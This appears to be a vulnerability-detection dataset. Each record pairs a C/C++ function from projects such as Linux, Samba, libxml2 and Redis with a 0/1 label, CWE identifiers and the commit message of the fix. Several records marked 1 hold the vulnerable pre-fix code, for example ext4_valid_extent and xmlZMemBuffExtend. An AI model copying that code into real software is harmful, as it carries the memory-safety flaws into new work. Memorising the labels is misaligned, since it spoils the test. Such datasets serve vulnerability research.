patch 8.2.4253: using freed memory when substitute with function call
Problem: Using freed memory when substitute uses a recursive function call.
Solution: Make a copy of the substitute text.
|
base_context::base_context()
{
set_acceleration_functions(de265_acceleration_AUTO);
}
| 0 |
[
"CWE-416"
] |
libde265
|
f538254e4658ef5ea4e233c2185dcbfd165e8911
| 181,458,493,577,876,600,000,000,000,000,000,000,000 | 4 |
fix streams where SPS image size changes without refreshing PPS (#299)
|
static int ext4_valid_extent(struct inode *inode, struct ext4_extent *ext)
{
ext4_fsblk_t block = ext4_ext_pblock(ext);
int len = ext4_ext_get_actual_len(ext);
ext4_lblk_t lblock = le32_to_cpu(ext->ee_block);
/*
* We allow neither:
* - zero length
* - overflow/wrap-around
*/
if (lblock + len <= lblock)
return 0;
return ext4_data_block_valid(EXT4_SB(inode->i_sb), block, len);
}
| 1 |
[
"CWE-703"
] |
linux
|
ce9f24cccdc019229b70a5c15e2b09ad9c0ab5d1
| 65,166,371,645,133,430,000,000,000,000,000,000,000 | 15 |
ext4: check journal inode extents more carefully
Currently, system zones just track ranges of blocks that are "important"
fs metadata (bitmaps, group descriptors, journal blocks, etc.). This
however complicates how extent tree (or indirect blocks) can be checked
for inodes that actually track such metadata - currently the journal
inode but arguably we should be treating quota files or resize inode
similarly. We cannot run __ext4_ext_check() on such metadata inodes when
loading their extents as that would immediately trigger the validity
checks and so we just hack around that and special-case the journal
inode. This however leads to a situation where a journal inode with an
extent tree of depth at least one can have an invalid extent tree that
goes unnoticed until ext4_cache_extents() crashes.
To overcome this limitation, track the inode number each system zone
belongs to (0 is used for zones not belonging to any inode). We can then
verify the inode number matches the expected one when verifying the
extent tree and thus avoid the false errors. With this there's no need
to special-case the journal inode during extent tree checking anymore,
so remove it.
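The data-structure change can be sketched as (illustrative, not the exact ext4 struct):
/* Each system zone remembers which inode owns it (0 = generic fs
 * metadata), so extent checks on e.g. the journal inode can match
 * zones against the expected owner instead of raising false errors. */
struct system_zone_sketch {
	unsigned long long start_blk;   /* first block of the zone */
	unsigned long long count;       /* number of blocks */
	unsigned long ino;              /* owning inode number, 0 if none */
};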
Fixes: 0a944e8a6c66 ("ext4: don't perform block validity checks on the journal inode")
Reported-by: Wolfgang Frisch <[email protected]>
Reviewed-by: Lukas Czerner <[email protected]>
Signed-off-by: Jan Kara <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Theodore Ts'o <[email protected]>
|
static krb5_error_code hdb_samba4_set_sync(krb5_context context, struct HDB *db, int set_sync)
{
return 0;
}
| 0 |
[
"CWE-288"
] |
samba
|
484c6980befb86f7d81d708829ed4ceb819538eb
| 16,781,912,639,939,129,000,000,000,000,000,000,000 | 4 |
CVE-2022-32744 s4:kdc: Modify HDB plugin to only look up kpasswd principal
This plugin is now only used by the kpasswd service. Thus, ensuring we
only look up the kadmin/changepw principal means we can't be fooled into
accepting tickets for other service principals. We make sure not to
specify a specific kvno, to ensure that we do not accept RODC-issued
tickets.
BUG: https://bugzilla.samba.org/show_bug.cgi?id=15074
Signed-off-by: Joseph Sutton <[email protected]>
Reviewed-by: Andreas Schneider <[email protected]>
|
/**
\param reinit_path Force path to be recalculated (may take some time).
\return Path containing the program files.
**/
#if cimg_OS==2
inline const char* programfiles_path(const char *const user_path, const bool reinit_path) {
static CImg<char> s_path;
cimg::mutex(7);
if (reinit_path) s_path.assign();
if (user_path) {
if (!s_path) s_path.assign(1024);
std::strncpy(s_path,user_path,1023);
} else if (!s_path) {
s_path.assign(MAX_PATH);
*s_path = 0;
// Note: in the following line, 0x26 = CSIDL_PROGRAM_FILES (not defined on every compiler).
#if !defined(__INTEL_COMPILER)
if (!SHGetSpecialFolderPathA(0,s_path,0x0026,false)) {
const char *const pfPath = std::getenv("PROGRAMFILES");
if (pfPath) std::strncpy(s_path,pfPath,MAX_PATH - 1);
else std::strcpy(s_path,"C:\\PROGRA~1");
}
#else
std::strcpy(s_path,"C:\\PROGRA~1");
#endif
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 189,147,604,983,129,800,000,000,000,000,000,000,000 | 24 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
bgp_notify_send (struct peer *peer, u_char code, u_char sub_code)
{
bgp_notify_send_with_data (peer, code, sub_code, NULL, 0);
}
| 0 |
[
"CWE-119"
] |
quagga
|
5861739f8c38bc36ea9955e5cb2be2bf2f482d70
| 26,567,767,262,571,995,000,000,000,000,000,000,000 | 4 |
bgpd: Open option parse errors don't NOTIFY, resulting in abort & DoS
* bgp_packet.c: (bgp_open_receive) Errors from bgp_open_option_parse are
detected, and the code will stop processing the OPEN and return. However
it does so without calling bgp_notify_send to send a NOTIFY - which means
the peer FSM doesn't get stopped, and bgp_read will be called again later.
Because it returns, it doesn't go through the code near the end of the
function that removes the current message from the peer input streaam.
Thus the next call to bgp_read will try to parse a half-parsed stream as
if it were a new BGP message, leading to an assert later in the code when
it tries to read stuff that isn't there. Add the required call to
bgp_notify_send before returning.
* bgp_open.c: (bgp_capability_as4) Be a bit stricter, check the length field
corresponds to the only value it can be, which is the amount we're going to
read off the stream. And make sure the capability flag gets set, so
callers can know this capability was read, regardless.
(peek_for_as4_capability) Let bgp_capability_as4 do the length check.
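The stricter check boils down to something like this sketch (the length constant and surrounding types are assumptions; an AS4 capability carries exactly one 32-bit ASN):
/* Sketch only, not the exact quagga diff. */
static int capability_as4_sketch (struct capability_header *hdr,
                                  struct stream *s, as_t *as4)
{
  if (hdr->length != 4)     /* the only legal value: one 32-bit ASN */
    return -1;              /* malformed; caller should NOTIFY */
  *as4 = stream_getl (s);   /* read exactly what was length-checked */
  return 0;
}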
|
BOOL security_decrypt(BYTE* data, int length, rdpRdp* rdp)
{
if (rdp->decrypt_use_count >= 4096)
{
security_key_update(rdp->decrypt_key, rdp->decrypt_update_key, rdp->rc4_key_len);
crypto_rc4_free(rdp->rc4_decrypt_key);
rdp->rc4_decrypt_key = crypto_rc4_init(rdp->decrypt_key, rdp->rc4_key_len);
rdp->decrypt_use_count = 0;
}
crypto_rc4(rdp->rc4_decrypt_key, length, data, data);
rdp->decrypt_use_count += 1;
rdp->decrypt_checksum_use_count++;
return TRUE;
}
| 1 |
[
"CWE-476"
] |
FreeRDP
|
7d58aac24fe20ffaad7bd9b40c9ddf457c1b06e7
| 205,657,723,076,012,400,000,000,000,000,000,000,000 | 14 |
security: add a NULL pointer check to fix a server crash.
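The fix direction is a guard of roughly this shape (a sketch; the actual patch may differ in placement and error handling):
/* Validate the RC4 context before use instead of dereferencing NULL. */
BOOL security_decrypt_checked(BYTE* data, int length, rdpRdp* rdp)
{
	if (rdp->rc4_decrypt_key == NULL)
		return FALSE;
	return security_decrypt(data, length, rdp);
}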
|
static int compat_calc_match(struct ebt_entry_match *m, int *off)
{
*off += ebt_compat_match_offset(m->u.match, m->match_size);
*off += ebt_compat_entry_padsize();
return 0;
}
| 0 |
[
"CWE-787"
] |
linux
|
b71812168571fa55e44cdd0254471331b9c4c4c6
| 83,456,839,401,766,640,000,000,000,000,000,000,000 | 6 |
netfilter: ebtables: CONFIG_COMPAT: don't trust userland offsets
We need to make sure the offsets are not out of range of the
total size.
Also check that they are in ascending order.
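In isolation the validation looks like this sketch (names illustrative):
/* Userland-supplied offsets must stay inside total_size and be
 * strictly ascending, otherwise parsing must bail out. */
static int offsets_valid(const unsigned int *off, unsigned int n,
			 unsigned int total_size)
{
	unsigned int i;
	for (i = 0; i < n; i++) {
		if (off[i] >= total_size)
			return 0;               /* out of range */
		if (i > 0 && off[i] <= off[i - 1])
			return 0;               /* not ascending */
	}
	return 1;
}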
The WARN_ON triggered by syzkaller (it sets panic_on_warn) is
changed to also bail out, no point in continuing parsing.
Briefly tested with simple ruleset of
-A INPUT --limit 1/s' --log
plus jump to custom chains using 32bit ebtables binary.
Reported-by: <[email protected]>
Signed-off-by: Florian Westphal <[email protected]>
Signed-off-by: Pablo Neira Ayuso <[email protected]>
|
DECLARESepPutFunc(putRGBAAseparate16bittile)
{
uint16 *wr = (uint16*) r;
uint16 *wg = (uint16*) g;
uint16 *wb = (uint16*) b;
uint16 *wa = (uint16*) a;
(void) img; (void) y;
for( ; h > 0; --h) {
for (x = 0; x < w; x++)
*cp++ = PACK4(img->Bitdepth16To8[*wr++],
img->Bitdepth16To8[*wg++],
img->Bitdepth16To8[*wb++],
img->Bitdepth16To8[*wa++]);
SKEW4(wr, wg, wb, wa, fromskew);
cp += toskew;
}
}
| 0 |
[
"CWE-787"
] |
libtiff
|
4bb584a35f87af42d6cf09d15e9ce8909a839145
| 203,355,743,376,785,800,000,000,000,000,000,000,000 | 17 |
RGBA interface: fix integer overflow potentially causing write heap buffer overflow, especially on 32 bit builds. Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=16443. Credit to OSS Fuzz
|
SCTP_STATIC int sctp_setsockopt_bindx(struct sock* sk,
struct sockaddr __user *addrs,
int addrs_size, int op)
{
struct sockaddr *kaddrs;
int err;
int addrcnt = 0;
int walk_size = 0;
struct sockaddr *sa_addr;
void *addr_buf;
struct sctp_af *af;
SCTP_DEBUG_PRINTK("sctp_setsocktopt_bindx: sk %p addrs %p"
" addrs_size %d opt %d\n", sk, addrs, addrs_size, op);
if (unlikely(addrs_size <= 0))
return -EINVAL;
/* Check the user passed a healthy pointer. */
if (unlikely(!access_ok(VERIFY_READ, addrs, addrs_size)))
return -EFAULT;
/* Alloc space for the address array in kernel memory. */
kaddrs = kmalloc(addrs_size, GFP_KERNEL);
if (unlikely(!kaddrs))
return -ENOMEM;
if (__copy_from_user(kaddrs, addrs, addrs_size)) {
kfree(kaddrs);
return -EFAULT;
}
/* Walk through the addrs buffer and count the number of addresses. */
addr_buf = kaddrs;
while (walk_size < addrs_size) {
sa_addr = (struct sockaddr *)addr_buf;
af = sctp_get_af_specific(sa_addr->sa_family);
/* If the address family is not supported or if this address
* causes the address buffer to overflow return EINVAL.
*/
if (!af || (walk_size + af->sockaddr_len) > addrs_size) {
kfree(kaddrs);
return -EINVAL;
}
addrcnt++;
addr_buf += af->sockaddr_len;
walk_size += af->sockaddr_len;
}
/* Do the work. */
switch (op) {
case SCTP_BINDX_ADD_ADDR:
err = sctp_bindx_add(sk, kaddrs, addrcnt);
if (err)
goto out;
err = sctp_send_asconf_add_ip(sk, kaddrs, addrcnt);
break;
case SCTP_BINDX_REM_ADDR:
err = sctp_bindx_rem(sk, kaddrs, addrcnt);
if (err)
goto out;
err = sctp_send_asconf_del_ip(sk, kaddrs, addrcnt);
break;
default:
err = -EINVAL;
break;
}
out:
kfree(kaddrs);
return err;
}
| 0 |
[] |
linux-2.6
|
5e739d1752aca4e8f3e794d431503bfca3162df4
| 254,491,089,165,664,000,000,000,000,000,000,000,000 | 76 |
sctp: fix potential panics in the SCTP-AUTH API.
All of the SCTP-AUTH socket options could cause a panic
if the extension is disabled and the API is invoked.
There were also assumptions that
certain pointers would always be valid, which may not
always be the case.
This patch hardens the API and addresses all of the crash
scenarios.
Signed-off-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
void
ConnStateData::stopSending(const char *error)
{
debugs(33, 4, HERE << "sending error (" << clientConnection << "): " << error <<
"; old receiving error: " <<
(stoppedReceiving() ? stoppedReceiving_ : "none"));
if (const char *oldError = stoppedSending()) {
debugs(33, 3, HERE << "already stopped sending: " << oldError);
return; // nothing has changed as far as this connection is concerned
}
stoppedSending_ = error;
if (!stoppedReceiving()) {
if (const int64_t expecting = mayNeedToReadMoreBody()) {
debugs(33, 5, HERE << "must still read " << expecting <<
" request body bytes with " << inBuf.length() << " unused");
return; // wait for the request receiver to finish reading
}
}
clientConnection->close();
}
| 0 |
[
"CWE-444"
] |
squid
|
fd68382860633aca92065e6c343cfd1b12b126e7
| 40,585,957,388,874,897,000,000,000,000,000,000,000 | 22 |
Improve Transfer-Encoding handling (#702)
Reject messages containing Transfer-Encoding header with coding other
than chunked or identity. Squid does not support other codings.
For simplicity and security's sake, also reject messages where
Transfer-Encoding contains unnecessary complex values that are
technically equivalent to "chunked" or "identity" (e.g., ",,chunked" or
"identity, chunked").
RFC 7230 formally deprecated and removed identity coding, but it is
still used by some agents.
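Reduced to a sketch, the acceptance test is (illustrative, not Squid's actual parser, which also handles case and whitespace):
#include <string.h>
/* Accept only a lone "chunked" or "identity" coding; any list,
 * padding, or unknown coding is rejected. */
static int te_acceptable(const char *value)
{
    return strcmp(value, "chunked") == 0 || strcmp(value, "identity") == 0;
}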
|
static PHP_GINIT_FUNCTION(xml)
{
xml_globals->default_encoding = "UTF-8";
}
| 0 |
[
"CWE-787"
] |
php-src
|
7d163e8a0880ae8af2dd869071393e5dc07ef271
| 55,329,516,146,207,850,000,000,000,000,000,000,000 | 4 |
truncate results at depth of 255 to prevent corruption
|
static void
_message_send_receipt(const char *const fulljid, const char *const message_id)
{
xmpp_ctx_t * const ctx = connection_get_ctx();
char *id = create_unique_id("receipt");
xmpp_stanza_t *message = xmpp_message_new(ctx, NULL, fulljid, id);
free(id);
xmpp_stanza_t *receipt = xmpp_stanza_new(ctx);
xmpp_stanza_set_name(receipt, "received");
xmpp_stanza_set_ns(receipt, STANZA_NS_RECEIPTS);
xmpp_stanza_set_id(receipt, message_id);
xmpp_stanza_add_child(message, receipt);
xmpp_stanza_release(receipt);
_send_message_stanza(message);
xmpp_stanza_release(message);
}
| 0 |
[
"CWE-20",
"CWE-346"
] |
profanity
|
8e75437a7e43d4c55e861691f74892e666e29b0b
| 229,754,311,861,433,500,000,000,000,000,000,000,000 | 19 |
Add carbons from check
|
struct kern_ipc_perm *ipcctl_pre_down(struct ipc_namespace *ns,
struct ipc_ids *ids, int id, int cmd,
struct ipc64_perm *perm, int extra_perm)
{
struct kern_ipc_perm *ipcp;
ipcp = ipcctl_pre_down_nolock(ns, ids, id, cmd, perm, extra_perm);
if (IS_ERR(ipcp))
goto out;
spin_lock(&ipcp->lock);
out:
return ipcp;
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
6062a8dc0517bce23e3c2f7d2fea5e22411269a3
| 84,834,754,559,869,450,000,000,000,000,000,000,000 | 14 |
ipc,sem: fine grained locking for semtimedop
Introduce finer grained locking for semtimedop, to handle the common case
of a program wanting to manipulate one semaphore from an array with
multiple semaphores.
If the call is a semop manipulating just one semaphore in an array with
multiple semaphores, only take the lock for that semaphore itself.
If the call needs to manipulate multiple semaphores, or another caller is
in a transaction that manipulates multiple semaphores, the sem_array lock
is taken, as well as all the locks for the individual semaphores.
On a 24 CPU system, performance numbers with the semop-multi
test with N threads and N semaphores, look like this:
vanilla Davidlohr's Davidlohr's + Davidlohr's +
threads patches rwlock patches v3 patches
10 610652 726325 1783589 2142206
20 341570 365699 1520453 1977878
30 288102 307037 1498167 2037995
40 290714 305955 1612665 2256484
50 288620 312890 1733453 2650292
60 289987 306043 1649360 2388008
70 291298 306347 1723167 2717486
80 290948 305662 1729545 2763582
90 290996 306680 1736021 2757524
100 292243 306700 1773700 3059159
[[email protected]: do not call sem_lock when bogus sma]
[[email protected]: make refcounter atomic]
Signed-off-by: Rik van Riel <[email protected]>
Suggested-by: Linus Torvalds <[email protected]>
Acked-by: Davidlohr Bueso <[email protected]>
Cc: Chegu Vinod <[email protected]>
Cc: Jason Low <[email protected]>
Reviewed-by: Michel Lespinasse <[email protected]>
Cc: Peter Hurley <[email protected]>
Cc: Stanislav Kinsbursky <[email protected]>
Tested-by: Emmanuel Benisty <[email protected]>
Tested-by: Sedat Dilek <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
int btrfs_ioctl_get_supported_features(void __user *arg)
{
static const struct btrfs_ioctl_feature_flags features[3] = {
INIT_FEATURE_FLAGS(SUPP),
INIT_FEATURE_FLAGS(SAFE_SET),
INIT_FEATURE_FLAGS(SAFE_CLEAR)
};
if (copy_to_user(arg, &features, sizeof(features)))
return -EFAULT;
return 0;
}
| 0 |
[
"CWE-476",
"CWE-284"
] |
linux
|
09ba3bc9dd150457c506e4661380a6183af651c1
| 261,444,287,984,716,200,000,000,000,000,000,000,000 | 13 |
btrfs: merge btrfs_find_device and find_device
Both btrfs_find_device() and find_device() does the same thing except
that the latter does not take the seed device onto account in the device
scanning context. We can merge them.
Signed-off-by: Anand Jain <[email protected]>
Reviewed-by: David Sterba <[email protected]>
Signed-off-by: David Sterba <[email protected]>
|
static void GetRootMeanSquarePixelList(PixelList *pixel_list,
MagickPixelPacket *pixel)
{
MagickRealType
sum;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the root mean square value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
do
{
color=list->nodes[color].next[0];
sum+=(MagickRealType) (list->nodes[color].count*color*color);
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
channels[channel]=(unsigned short) sqrt(sum);
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
ImageMagick6
|
91e58d967a92250439ede038ccfb0913a81e59fe
| 136,641,173,214,208,860,000,000,000,000,000,000,000 | 45 |
https://github.com/ImageMagick/ImageMagick/issues/1615
|
static inline void drop_fpu(struct task_struct *tsk)
{
/*
* Forget coprocessor state..
*/
preempt_disable();
tsk->thread.fpu_counter = 0;
__drop_fpu(tsk);
clear_used_math();
preempt_enable();
}
| 0 |
[
"CWE-284",
"CWE-264"
] |
linux
|
26bef1318adc1b3a530ecc807ef99346db2aa8b0
| 239,937,444,810,003,900,000,000,000,000,000,000,000 | 11 |
x86, fpu, amd: Clear exceptions in AMD FXSAVE workaround
Before we do an EMMS in the AMD FXSAVE information leak workaround we
need to clear any pending exceptions, otherwise we trap with a
floating-point exception inside this code.
Reported-by: halfdog <[email protected]>
Tested-by: Borislav Petkov <[email protected]>
Link: http://lkml.kernel.org/r/CA%2B55aFxQnY_PCG_n4=0w-VG=YLXL-yr7oMxyy0WU2gCBAf3ydg@mail.gmail.com
Signed-off-by: H. Peter Anvin <[email protected]>
|
bool vmx_interrupt_blocked(struct kvm_vcpu *vcpu)
{
if (is_guest_mode(vcpu) && nested_exit_on_intr(vcpu))
return false;
return !(vmx_get_rflags(vcpu) & X86_EFLAGS_IF) ||
(vmcs_read32(GUEST_INTERRUPTIBILITY_INFO) &
(GUEST_INTR_STATE_STI | GUEST_INTR_STATE_MOV_SS));
}
| 0 |
[
"CWE-787"
] |
linux
|
04c4f2ee3f68c9a4bf1653d15f1a9a435ae33f7a
| 177,415,953,467,357,200,000,000,000,000,000,000,000 | 9 |
KVM: VMX: Don't use vcpu->run->internal.ndata as an array index
__vmx_handle_exit() uses vcpu->run->internal.ndata as an index for
an array access. Since vcpu->run is (can be) mapped to a user address
space with write permission, the 'ndata' could be updated by the
user process at any time (the user process can set it to outside the
bounds of the array).
So, it is not safe that __vmx_handle_exit() uses the 'ndata' that way.
Fixes: 1aa561b1a4c0 ("kvm: x86: Add "last CPU" to some KVM_EXIT information")
Signed-off-by: Reiji Watanabe <[email protected]>
Reviewed-by: Jim Mattson <[email protected]>
Message-Id: <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
|
char *
nautilus_file_get_name (NautilusFile *file)
{
return g_strdup (eel_ref_str_peek (file->details->name));
}
| 0 |
[] |
nautilus
|
7632a3e13874a2c5e8988428ca913620a25df983
| 132,610,232,748,099,610,000,000,000,000,000,000,000 | 4 |
Check for trusted desktop file launchers.
2009-02-24 Alexander Larsson <[email protected]>
* libnautilus-private/nautilus-directory-async.c:
Check for trusted desktop file launchers.
* libnautilus-private/nautilus-file-private.h:
* libnautilus-private/nautilus-file.c:
* libnautilus-private/nautilus-file.h:
Add nautilus_file_is_trusted_link.
Allow unsetting of custom display name.
* libnautilus-private/nautilus-mime-actions.c:
Display dialog when trying to launch a non-trusted desktop file.
svn path=/trunk/; revision=15003
|
bool
checkOpenEXRFile(const char* fileName, bool reduceMemory, bool reduceTime)
{
return runChecks( fileName , reduceMemory , reduceTime );
}
| 0 |
[
"CWE-787"
] |
openexr
|
ae6d203892cc9311917a7f4f05354ef792b3e58e
| 317,615,714,893,969,300,000,000,000,000,000,000,000 | 4 |
Handle xsampling and bad seekg() calls in exrcheck (#872)
* fix exrcheck xsampling!=1
Signed-off-by: Peter Hillman <[email protected]>
* fix handling bad seekg() calls in exrcheck
Signed-off-by: Peter Hillman <[email protected]>
* fix deeptile detection in multipart files
Signed-off-by: Peter Hillman <[email protected]>
|
bool git_path_does_fs_decompose_unicode(const char *root)
{
GIT_UNUSED(root);
return false;
}
| 0 |
[
"CWE-20",
"CWE-706"
] |
libgit2
|
3f7851eadca36a99627ad78cbe56a40d3776ed01
| 307,914,677,996,329,860,000,000,000,000,000,000,000 | 5 |
Disallow NTFS Alternate Data Stream attacks, even on Linux/macOS
A little-known feature of NTFS is that it offers to store metadata in
so-called "Alternate Data Streams" (inspired by Apple's "resource
forks") that are copied together with the file they are associated with.
These Alternate Data Streams can be accessed via `<file name>:<stream
name>:<stream type>`.
Directories, too, have Alternate Data Streams, and they even have a
default stream type `$INDEX_ALLOCATION`. Which means that `abc/` and
`abc::$INDEX_ALLOCATION/` are actually equivalent.
This is of course another attack vector on the Git directory that we
definitely want to prevent.
On Windows, we already do this incidentally, by disallowing colons in
file/directory names.
While it looks as if files'/directories' Alternate Data Streams are not
accessible in the Windows Subsystem for Linux, and neither via
CIFS/SMB-mounted network shares in Linux, it _is_ possible to access
them on SMB-mounted network shares on macOS.
Therefore, let's go the extra mile and prevent this particular attack
_everywhere_. To keep things simple, let's just disallow *any* Alternate
Data Stream of `.git`.
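A sketch of the per-component check (not libgit2's exact verifier):
#include <strings.h>
/* Reject any path component naming an Alternate Data Stream of .git,
 * e.g. ".git::$INDEX_ALLOCATION" or ".git:anything". */
static int is_dotgit_ads(const char *component)
{
	return strncasecmp(component, ".git:", 5) == 0;
}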
This is libgit2's variant of CVE-2019-1352.
Signed-off-by: Johannes Schindelin <[email protected]>
|
xmlZMemBuffExtend( xmlZMemBuffPtr buff, size_t ext_amt ) {
int rc = -1;
size_t new_size;
size_t cur_used;
unsigned char * tmp_ptr = NULL;
if ( buff == NULL )
return ( -1 );
else if ( ext_amt == 0 )
return ( 0 );
cur_used = buff->zctrl.next_out - buff->zbuff;
new_size = buff->size + ext_amt;
#ifdef DEBUG_HTTP
if ( cur_used > new_size )
xmlGenericError( xmlGenericErrorContext,
"xmlZMemBuffExtend: %s\n%s %d bytes.\n",
"Buffer overwrite detected during compressed memory",
"buffer extension. Overflowed by",
(cur_used - new_size ) );
#endif
tmp_ptr = xmlRealloc( buff->zbuff, new_size );
if ( tmp_ptr != NULL ) {
rc = 0;
buff->size = new_size;
buff->zbuff = tmp_ptr;
buff->zctrl.next_out = tmp_ptr + cur_used;
buff->zctrl.avail_out = new_size - cur_used;
}
else {
xmlChar msg[500];
xmlStrPrintf(msg, 500,
(const xmlChar *) "xmlZMemBuffExtend: %s %lu bytes.\n",
"Allocation failure extending output buffer to",
new_size );
xmlIOErr(XML_IO_WRITE, (const char *) msg);
}
return ( rc );
}
| 1 |
[
"CWE-134"
] |
libxml2
|
4472c3a5a5b516aaf59b89be602fbce52756c3e9
| 66,621,654,187,306,550,000,000,000,000,000,000,000 | 45 |
Fix some format string warnings with possible format string vulnerability
For https://bugzilla.gnome.org/show_bug.cgi?id=761029
Decorate every method in libxml2 with the appropriate
LIBXML_ATTR_FORMAT(fmt,args) macro and add some cleanups
following the reports.
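For context, such a macro typically wraps GCC's format attribute so the compiler can verify printf-style call sites; a sketch of the idea (definition approximated):
#define ATTR_FORMAT_SKETCH(fmt, args) \
        __attribute__((__format__(__printf__, fmt, args)))
void xml_err_sketch(const char *msg, ...) ATTR_FORMAT_SKETCH(1, 2);
/* xml_err_sketch("%d", "str") now draws a -Wformat warning. */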
|
hostkey_method_ssh_ecdsa_signv(LIBSSH2_SESSION * session,
unsigned char **signature,
size_t *signature_len,
int veccount,
const struct iovec datavec[],
void **abstract)
{
libssh2_ecdsa_ctx *ec_ctx = (libssh2_ecdsa_ctx *) (*abstract);
libssh2_curve_type type = _libssh2_ecdsa_key_get_curve_type(ec_ctx);
int ret = 0;
if(type == LIBSSH2_EC_CURVE_NISTP256) {
LIBSSH2_HOSTKEY_METHOD_EC_SIGNV_HASH(256);
}
else if(type == LIBSSH2_EC_CURVE_NISTP384) {
LIBSSH2_HOSTKEY_METHOD_EC_SIGNV_HASH(384);
}
else if(type == LIBSSH2_EC_CURVE_NISTP521) {
LIBSSH2_HOSTKEY_METHOD_EC_SIGNV_HASH(512);
}
else {
return -1;
}
return ret;
}
| 0 |
[
"CWE-787"
] |
libssh2
|
dc109a7f518757741590bb993c0c8412928ccec2
| 168,715,991,971,787,410,000,000,000,000,000,000,000 | 26 |
Security fixes (#315)
* Bounds checks
Fixes for CVEs
https://www.libssh2.org/CVE-2019-3863.html
https://www.libssh2.org/CVE-2019-3856.html
* Packet length bounds check
CVE
https://www.libssh2.org/CVE-2019-3855.html
* Response length check
CVE
https://www.libssh2.org/CVE-2019-3859.html
* Bounds check
CVE
https://www.libssh2.org/CVE-2019-3857.html
* Bounds checking
CVE
https://www.libssh2.org/CVE-2019-3859.html
and additional data validation
* Check bounds before reading into buffers
* Bounds checking
CVE
https://www.libssh2.org/CVE-2019-3859.html
* declare SIZE_MAX and UINT_MAX if needed
|
void mp_buf_free(lua_State *L, mp_buf *buf) {
mp_realloc(L, buf->b, buf->len + buf->free, 0); /* realloc to 0 = free */
mp_realloc(L, buf, sizeof(*buf), 0);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
redis
|
52a00201fca331217c3b4b8b634f6a0f57d6b7d3
| 314,018,632,086,058,500,000,000,000,000,000,000,000 | 4 |
Security: fix Lua cmsgpack library stack overflow.
During an auditing effort, the Apple Vulnerability Research team discovered
a critical Redis security issue affecting the Lua scripting part of Redis.
-- Description of the problem
Several years ago I merged a pull request including many small changes at
the Lua MsgPack library (that originally I authored myself). The Pull
Request entered Redis in commit 90b6337c1, in 2014.
Unfortunately one of the changes included a variadic Lua function that
lacked the check for the available Lua C stack. As a result, calling the
"pack" MsgPack library function with a large number of arguments, results
into pushing into the Lua C stack a number of new values proportional to
the number of arguments the function was called with. The pushed values,
moreover, are controlled by untrusted user input.
This in turn causes stack smashing which we believe to be exploitable,
while not very deterministic, but it is likely that an exploit could be
created targeting specific versions of Redis executables. However at its
minimum the issue results in a DoS, crashing the Redis server.
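The missing guard is the Lua C API's stack check; a sketch of the class of fix (not Redis's exact patch):
#include "lua.h"
#include "lauxlib.h"
/* A variadic C function must grow the Lua C stack before pushing
 * ~nargs values, or fail cleanly instead of smashing the stack. */
static int pack_sketch(lua_State *L)
{
    int nargs = lua_gettop(L);
    if (!lua_checkstack(L, nargs + LUA_MINSTACK))
        return luaL_error(L, "too many arguments to pack");
    /* ... safe to push up to nargs values now ... */
    return 1;
}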
-- Versions affected
Versions greater or equal to Redis 2.8.18 are affected.
-- Reproducing
Reproduce with this (based on the original reproduction script by
Apple security team):
https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a
-- Verification of the fix
The fix was tested in the following way:
1) I checked that the problem is no longer observable running the trigger.
2) The Lua code was analyzed to understand the stack semantics, and that
actually enough stack is allocated in all the cases of mp_pack() calls.
3) The mp_pack() function was modified in order to show exactly what items
in the stack were being set, to make sure that there is no silent overflow
even after the fix.
-- Credits
Thank you to the Apple team and to the other persons that helped me
checking the patch and coordinating this communication.
|
static long kvm_s390_guest_sida_op(struct kvm_vcpu *vcpu,
struct kvm_s390_mem_op *mop)
{
void __user *uaddr = (void __user *)mop->buf;
int r = 0;
if (mop->flags || !mop->size)
return -EINVAL;
if (mop->size + mop->sida_offset < mop->size)
return -EINVAL;
if (mop->size + mop->sida_offset > sida_size(vcpu->arch.sie_block))
return -E2BIG;
switch (mop->op) {
case KVM_S390_MEMOP_SIDA_READ:
if (copy_to_user(uaddr, (void *)(sida_origin(vcpu->arch.sie_block) +
mop->sida_offset), mop->size))
r = -EFAULT;
break;
case KVM_S390_MEMOP_SIDA_WRITE:
if (copy_from_user((void *)(sida_origin(vcpu->arch.sie_block) +
mop->sida_offset), uaddr, mop->size))
r = -EFAULT;
break;
}
return r;
}
| 0 |
[
"CWE-416"
] |
linux
|
0774a964ef561b7170d8d1b1bfe6f88002b6d219
| 116,578,996,635,341,920,000,000,000,000,000,000,000 | 28 |
KVM: Fix out of range accesses to memslots
Reset the LRU slot if it becomes invalid when deleting a memslot to fix
an out-of-bounds/use-after-free access when searching through memslots.
Explicitly check for there being no used slots in search_memslots(), and
in the caller of s390's approximation variant.
Fixes: 36947254e5f9 ("KVM: Dynamically size memslot array based on number of used slots")
Reported-by: Qian Cai <[email protected]>
Cc: Peter Xu <[email protected]>
Signed-off-by: Sean Christopherson <[email protected]>
Message-Id: <[email protected]>
Acked-by: Christian Borntraeger <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
Sequence(std::vector<std::shared_ptr<Ope>> &&opes) : opes_(opes) {}
| 0 |
[
"CWE-125"
] |
cpp-peglib
|
b3b29ce8f3acf3a32733d930105a17d7b0ba347e
| 771,277,851,122,894,000,000,000,000,000,000,000 | 1 |
Fix #122
|
static const char* format_s() { return "%s"; }
| 0 |
[
"CWE-125"
] |
